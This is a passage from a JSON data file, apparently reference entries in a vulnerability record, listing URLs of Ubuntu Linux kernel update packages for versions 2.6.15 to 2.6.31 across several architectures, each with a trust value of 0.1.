        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17_2.6.27-17.45_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19_2.6.31-19.56_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-386_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-virtual_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.31_2.6.31-19.56_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-lpia_2.6.31-19.56_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-386_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-386_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
